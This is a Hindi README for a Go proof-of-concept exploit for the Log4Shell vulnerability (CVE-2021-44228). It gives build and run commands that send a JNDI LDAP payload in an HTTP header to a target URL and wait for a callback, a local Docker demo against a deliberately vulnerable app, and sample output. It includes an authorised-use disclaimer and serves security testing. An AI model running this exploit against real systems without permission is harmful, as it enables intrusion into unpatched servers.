
एक सरल Log4j PoC जो Go में लिखा गया है
⚠️ अस्वीकरण:
यह उपकरण केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और नियंत्रित परीक्षण वातावरण के लिए है।
बिना स्पष्ट अनुमति के सिस्टम के खिलाफ इसका उपयोग करना अवैध है और पूरी तरह से उपयोगकर्ता की जिम्मेदारी है।
इस परियोजना में Apache Log4j2 (CVE-2021-44228) भेद्यता के लिए एक सरल प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण शामिल है।
PoC लक्ष्य को JNDI LDAP पेलोड के साथ एक विशेष रूप से तैयार HTTP हेडर भेजता है।
यदि लक्ष्य संवेदनशील है, तो वह निर्दिष्ट LHOST पते पर एक कॉलबैक भेजेगा।
go build -o exploit exploit.go
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
-r → लक्ष्य URL (संवेदनशील एप्लिकेशन का एंडपॉइंट)-l → आपका कॉलबैक श्रोता IP पता (PoC चलाने वाली मशीन)प्रदान किए गए Docker संवेदनशील ऐप का उपयोग करना:
# संवेदनशील ऐप चलाएं
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# शोषण चलाएं
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1
अपेक्षित आउटपुट:
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE